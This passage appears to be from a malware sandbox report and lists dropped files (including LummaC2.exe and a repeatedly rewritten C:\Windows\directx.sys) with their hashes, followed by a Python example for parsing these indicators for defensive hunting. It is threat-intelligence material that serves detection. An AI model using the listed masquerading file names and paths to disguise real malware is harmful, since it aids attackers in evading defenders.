SHA512 0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3

C:\Windows\directx.sys

MD5 8b0a995545391b882fc260684f529208
SHA1 89c5f15738b517ddce82013f845adabc0665ff5c
SHA256 264fa8be6e42cbe887633dc906f28d0d760464b874886766514ff5c2d1ce1c6e
SHA512 baf9a6984e4e30b45b8630a0dfcdfc778baa19c946bb4ee1370e187f7b0d5591a3bc14f04abe353f2ba4ea836c80a60666f30162fe08095c574ed89a0b7c5636

C:\Users\Admin\AppData\Local\Temp\Files\compiled.exe

MD5 333e51675c05499cfadd3d5588f0f4ca
SHA1 aca16eda7f33dfb85bed885e2437a8987d7a09e4
SHA256 cdc184f53927538be9c65604552977077e645e7e2d1e491ae357f15c14a78407
SHA512 5c0a9609be977c5ee3561516791437afca6159d82955dc23ede5e6376f66df98d0e2d74f068ad2f350115cddf978450dfc17d0f97493a8128336e76a724ad335

C:\Windows\directx.sys

MD5 9cf429dd4a6a0dd3cf7515dae6ef9327
SHA1 3369feadd4197d7a368c14f1ef9c85631f8e605a
SHA256 8faf5200c821039d77d88884e7a03c79163700021ee5abb7239807bad24405b6
SHA512 7a7a8f6950916729effa1dcc59838f0179b33ff8055fe1ea5f1e4c8b76f2e7ef073da4a3a0c3b03e6eee49e73f691df288637e822db7101d878e874d13cdabf1

C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe

MD5 bc884c0edbc8df559985b42fdd2fc985
SHA1 9611a03c424e0285ab1a8ea9683918ce7b5909ab
SHA256 e848b330ee5a8bd5ae1f6b991551e30a4a5b2e5deeb4718a15b2122101f2c270
SHA512 1b8c97d500de45fbf994dcd9bf65cc78106a62ff0770a362add18866cceebbe9f5e157a77d26cb0d0d8de89abe3d446bc911f33e7027fa8f8809d2720b0cedcc

C:\Windows\directx.sys

MD5 c7a0cc3965520cc38740111fe3f55b61
SHA1 5cef4f1dae112429339f875da60a7d50d67cd78a
SHA256 5d42bd5ddcb1277949583349c95522426094bc8923c8df40daf26326bc090957
SHA512 cf7edeabebda1066a6305d91aabfe2fc3c58074eda009843dc684a7f86f98c9041baefce456d2ca55877edbcfed5b253bf53be3410d7f6cf93c412d735a16380

C:\Windows\directx.sys

MD5 2338780ec1bc1f4b97424a1456262ba2
SHA1 2285ee977709dc1ace6ddcf6bb39e4abc00471d0
SHA256 73d0228c8aaeb6bcbd3d1cac2b2c480d6523eb5a6c9a752e6321bee7c60eba02
SHA512 01326a1e951c8b7550e55075ff32eda424954bec3148dd32f89ddfd91e859f24ab62de53b07f8e2f9e037a5038c1204c5e06b86ce27b58bf5729402b6625f9f1

C:\Users\Admin\AppData\Local\Temp\Files\script.exe

MD5 308d9beab0eccfd8f218a89456b9b7d4
SHA1 b444fa187f2762104248a6ad7d82b1e9e145e366
SHA256 3570eab57ac55e89ce4467d665502896790881a21e93a25aabb738fa368e9e02
SHA512 b74095e5bc85fd4aef7685a18d4e7c64c322ba66823e8da6cd96f8551abf10f6376ac32728d33f72eb616e25587b442ff5a03866821151d64ac2102cffe68955

C:\Windows\directx.sys

MD5 458e721a633dd02ee168373b349fa41f
SHA1 c0a9797406339db9c1483559782ecf005972103b
SHA256 003520e16d86afae6689c72b47f71bddaa48467075f69f6e16c359de81ab9ab6
SHA512 555400787909f3b4300763828f202584153ade87d9e456869b7c713472358f9854aa1ebff62aee0375c1723a888ac8a2ed6166834dd11186d9a4cce83345c012

C:\Users\Admin\AppData\Local\Temp\Files\Meeting.exe

MD5 1ebcc328f7d1da17041835b0a960e1fa
SHA1 adf1fe6df61d59ca7ac6232de6ed3c07d6656a8c
SHA256 6779bc4c64850150de694166f4b215ce25bbaca7d60b293fa7bb65e6bdecbc1a
SHA512 0c537e8dbdf5de433f862a31fbcb5a709f7727783cb36f7ed3dcac1acb44d704d5ad570035259022b46a0370754d029f476ae40280983d1586de9098e31a31d6

C:\Windows\directx.sys

MD5 4520631eeebde97b3595206bb843d7c0
SHA1 9d87ec8f38bd50360a26d7f18b3bbaf3a7c6629e
SHA256 ab33dd8605a379c0c51a0325f873b8cc87388a27015e632f1286cb649a02fccb
SHA512 268628aac8e1a570ac0b3e1c772331ae646d5ef84f0f3988d1cf0731b8d08dd255cfecbb74d54a33d8d559e90c4afd7525776f4f0bd8b396acf26ef2b6584cf9

C:\Windows\directx.sys

MD5 165ca0b749ab573917e42a7880593b98
SHA1 e49654cd0d55efff1f5042a1fc69a64aa36b7e7e
SHA256 316231260744d64cd01dff4ab583cdd1af7554b284fb52161c6c9b5e7740c84d
SHA512 c45c5606ddd1333fa4beb6fa8f1ded9d88977d8d9af1f461df87484cdf5637c9f22018f8950cacae61e1efc12f393c7cf3e5a5ab4a4d2c5a6f2acbe64d83d634

C:\Users\Admin\AppData\Local\Temp\Files\LgendPremium.exe

MD5 c84baaa0b67d15dbc989ca2eb55a9b1c
SHA1 20231d1285e4de0916cc71e7d590313296f9d539
SHA256 9f8b8bd90df6a73c3fbd5eb730ca6866f2de8f09ba273d73e7a91731ca90ae79
SHA512 3decb9123dccef7da39cb2c51ba44b30fc79d68b9192b1e9fec95d3b19d2e77de593bfd6c2601718dc975148608ec21bfe047d103db1ba12fb1f2f954ea3de3f

C:\Users\Admin\AppData\Local\Temp\Files\LummaC2.exe

MD5 9b3eef2c222e08a30baefa06c4705ffc
SHA1 82847ce7892290e76be45b09aa309b27a9376e54
SHA256 8903d4bfe61ca3ca897af368619fe98a7d0ee81495df032b9380f00af41bbfc7
SHA512 5c72c37144b85b0a07077243ffe21907be315e90ba6c268fdb10597f1e3293e52a753dccbfd48578871a032898677c918fa71dc02d6861e05f98f5e718189b73

C:\Windows\directx.sys

MD5 87ce6d7b069cd87bdd151abd8ced7e7a
SHA1 94eeff064ad184c76595a36888f243e442331c3a
SHA256 ffd3911eb4a41072c93bb76e4ba94920c200e191b0d3df867ad8774062e0b65d
SHA512 94643d82e4e60b50dda43347568eb6362a6003fca1496965a7eb7cbe1b2ed466b406e013901c816e7446f7f9f41aaf3ec6fff1b2bbc9fccaebfd4971f68ffb00

C:\Users\Admin\AppData\Local\Temp\Files\XSploitLauncher.exe

MD5 4bd68436e78a4a0f7bb552e349ab418f
SHA1 a1c4c57efd9b246d85a47c523b5e0436b8c24deb
SHA256 a52f8f78ba063951c3e315c562df187b90c257a61585e4682821abf6cefec957
SHA512 070ebca410b909d0e0ce4ba9a8119aa45de42e1c8cffc18916b070e2ad6012f40f1b0784c375e8100a987ce84e71e51da353444241f9301217f159681c3d1bbd

C:\Windows\directx.sys

MD5 72d63b174b3773ce77b634431845a972
SHA1 62bced2f020f057056c81ea03ff1812c2bd94742
SHA256 ff6a52a81e791de64e67cf5515570ba49faf2c0406464f6012b4b52ef8f8e7f3
SHA512 304a6c040a4a3073537b656967bd6ff21064498a5ec88441c51b2a77cd4172adb91db5346acee407db699be5b2c127ccef8643bbd59cfb8d26cc5d6a14ed1d98

C:\Windows\directx.sys

MD5 32775a9411b219ca34dc17a53a1bbcdf
SHA1 085b6cc3b170eba52aba15733210f0bf6c08c87c
SHA256 89f5327c69733ae36ea7f95365bda7cb175fb38a62186faf7d6507040d48496f
SHA512 63081531a1009371574a1d0faa3351ce720f30d6f4588a589d055947a2522ca46565f7cdc91b279d7a6f183c18e9ea404636e0b49f622dc62640c0e5ea5f2095

C:\Users\Admin\AppData\Roaming\svchost.exe

MD5 39476c74921658da58506252acd72f92
SHA1 6b79e09a712dd56e8800ee191f18ead43ba7006a
SHA256 26cab4dad2281e9683c56570546a1940d257ddafcc706af85d60975a4dd2bb65
SHA512 20b43bdd535e9fee2bfc988f83c4cdb72def36631d57a0444f2dccc3f03e1e450655d8eca5555e21b76588bb6228a45a6ee238cb23e8eeffddff618ea379dabd

C:\Windows\directx.sys

MD5 2565f7eba76dcf49918f8dbeea07d9d1
SHA1 bc04a7888ee83fb5896f5e70d63fdf1395133f81
SHA256 939f7408f67db22361275c2ce47458ccafb6b7f7942abfc563d5d113a545fe31
SHA512 cd24dbee32529eb95302d92fe8c174ac978f51172a1b0fb9bf933e7cfbd47050dcfe2f19410858906ee73e193b2835aae5ce6ced2885d980322959ee6b1db8dc

C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe

MD5 25ed0fce4a9df59b3ed88853db8206f3
SHA1 4382f0adb2a94e8a4eccd6aa2d222842000b7895
SHA256 c5b32f1cdc2a48f1dd2b1623598c24a2635dc57fdab3b4328f1cb3b66f5079ba
SHA512 5a329229506e3f9feaefbe477699cc4b8510f949f4b1df0bf5b66ac892404a94fa5effef3d9acbdfa90bb6e494e5799fa721e14a29ec4e0f1e7b97719397939f

C:\Windows\directx.sys

MD5 6b9b9f45e1632060d475e787f583d7d5
SHA1 efb82ce05015771ece14c411db4095cc1c8c75a9
SHA256 4beda534bf5d4da7763ba8fd127d15e48742aeee5402a2e0d48f59f960edf7cc
SHA512 e165f4f36b590ee1aa782ed0157d9fc7ba8d84d5c528c194c8d195c0fed7b8be740cb6aed53ef7156840de36361b41f2da43a37a0c8832edae0c055e1a502a14

C:\Users\Admin\AppData\Local\Temp\Files\Operation6572.exe

MD5 913bdfccaaed0a1ed80d2c52e5f5d7c3
SHA1 9befba3d43ace45a777d2e936e1046e7a0fb634c
SHA256 93e66ad3eea5b3217d9a016cb96951ab2dd0ae3f3ef6c2782667abacaaa8018f
SHA512 1999d174e14b96ccb35dc8ffa2cc576aff9d01d9373654a2a0f78342735e8b637f605144f5c56e922dc5ee43afb82e62ab9f21e0ecfd33a1b8369344346f90e6

C:\Windows\directx.sys

MD5 e68569c4801699b3cb99d6099c1162ea
SHA1 209555eeb6b800970a225227e714a4659c7a4ec7
SHA256 fc013ca86b76569251e12ecdd3205e14ca2793eb4dfe116046a6c10abb2759c1
SHA512 b3d0da21f1ae519daa22abd3bc28c183de7531a991d53daf060693f819b64c2aaac0463871d0708658d7ac79c6b5608389c909312286b74c7c8290f7c26bb2aa

C:\Windows\directx.sys

MD5 a051804a55e27000cf84a88614b7a591
SHA1 54b245c1ab6e77755aacc7d8878b0a65fa24be3f
SHA256 9910f538a1d96eca1278b8ab1093f3b3805b873ce8267517e8e9c650ed48c716
SHA512 11607d2379b7aa85c656b789ccf0b8c6d15adc735c16c16b4276eac73d08c1238367044ecd8abda0acec464319a4d6ac8cf21c6d10671f9bbf755da2e2f1039a

C:\Windows\directx.sys

MD5 8a23e6c5964ee5698ede762f68caa8f2
SHA1 04aba5515e02d58c3e3b2f64d6f510b45ba249e5
SHA256 f6ebca18cffed9fad751fd0998a897b163f637b0095da8eb951de347533ddf91
SHA512 25229e2524941f82f33c6b4d97fc809e6fd50bf0d715bbe60ecca579537d035ed32d67fa8d36c1b0f18a72d2cbac00ba1e70d962c3bf579d8d8119a90f70b600
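The dropped-file listing above is one flat record per artifact: a path line, then its MD5/SHA1/SHA256/SHA512 (memory-dump entries carry no hashes). The following Python is an added example, not part of the sandbox report: it parses that format into structured IOCs, builds a digest lookup for hunting, flags paths that recur with different content, and checks an in-memory file against the lookup. The embedded sample is three records copied verbatim from the entries above; the function names are my own.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample: three records copied from the report's dropped-file list.
# Same shape as the full listing: path line, blank line, then hash lines.
SAMPLE = r"""
C:\Windows\directx.sys

MD5 b870f33192c7bbc1beaaac72a4591b65
SHA1 b33cd62acf957e6b11895dfc528593b7815b684c
SHA256 333eb244f5f14057dfa08b14d001faaa5c1960d8942097802b799cd6ec5bc6e4
SHA512 36a2a38222434efb04c33ff0a760adeddb0b692e1cb597faab7406b2f23db94ec6d741fedf6bb7dcb5477463a6d1b2fa26f87a83cbde3586c50b8b1dc03dba65

memory/2792-5585-0x0000000000810000-0x0000000000818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

MD5 3d2c42e4aca7233ac1becb634ad3fa0a
SHA1 d2d3b2c02e80106b9f7c48675b0beae39cf112b7
SHA256 eeea8f11bf728299c2033bc96d9a5bd07ea4f34e5a2fbaf55dc5741b9f098065
SHA512 76c3cf8c45e22676b256375a30a2defb39e74ad594a4ca4c960bad9d613fc2297d2e0e5cc6755cb8f958be6eadb0d7253d009056b75605480d7b81eb5db57957

C:\Windows\directx.sys

MD5 cea38347dfd84253c90b7d7d77b2ce99
SHA1 4b07ed3f30824d4500b3eb858801219b7e390aa7
SHA256 681b777f08ac59a41687fe714db2412057030e74ba3af545f4f297d3bf783560
SHA512 038714f92cb02b61c9767561818f977bf11f1c9c44b0a47cc3b772e1737e41f59e20d8bf0bd667ab17df1157dadeb69e3e6be16a852872299864f1726a0bcd5c
"""

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")


def parse_dropped_files(text):
    """Parse the path/hash listing into [{"path": str, "hashes": {algo: hex}}].

    Any non-blank line that is not a hash line starts a new record, so
    memory-dump entries (no hash lines) come back with an empty dict.
    Digest lengths are validated so a truncated hash cannot enter the IOC set.
    """
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if not m:
            current = {"path": line, "hashes": {}}
            records.append(current)
            continue
        if current is None:
            raise ValueError(f"hash line before any path: {line}")
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) != HASH_LEN[algo]:
            raise ValueError(f"bad {algo} length for {current['path']}: {digest}")
        current["hashes"][algo] = digest
    return records


def hash_index(records, algo="SHA256"):
    """Map digest -> sorted paths that were written with that content."""
    idx = defaultdict(set)
    for r in records:
        d = r["hashes"].get(algo)
        if d:
            idx[d].add(r["path"])
    return {d: sorted(p) for d, p in idx.items()}


def paths_with_many_hashes(records, algo="SHA256"):
    """Paths that recur with differing content: {path: [digest, ...]}.

    These are the entries to hunt by path rather than by hash, because
    every run rewrites them with new content.
    """
    seen = defaultdict(set)
    for r in records:
        d = r["hashes"].get(algo)
        if d:
            seen[r["path"]].add(d)
    return {p: sorted(ds) for p, ds in seen.items() if len(ds) > 1}


def match_bytes(data, index_by_algo):
    """Hash a file's bytes with each indexed algorithm and return the
    report paths it matches: {algo: [paths]}. index_by_algo is
    {algo: hash_index(...)}; the algo names are valid hashlib names."""
    hits = {}
    for algo, idx in index_by_algo.items():
        d = hashlib.new(algo.lower(), data).hexdigest()
        if d in idx:
            hits[algo] = idx[d]
    return hits


if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE)
    print(f"{len(recs)} records, {len(hash_index(recs))} distinct SHA256")
    print("rewritten paths:", paths_with_many_hashes(recs))
```

Run over the full listing, `hash_index` gives the set to sweep endpoint file inventories with, while `paths_with_many_hashes` separates out entries such as `C:\Windows\directx.sys`, which this report records many times with a different digest each time; hashing those is pointless, and their repeated rewriting is consistent with the Neshta tag in the report's signature list, so a path-based detection is the right artifact for them.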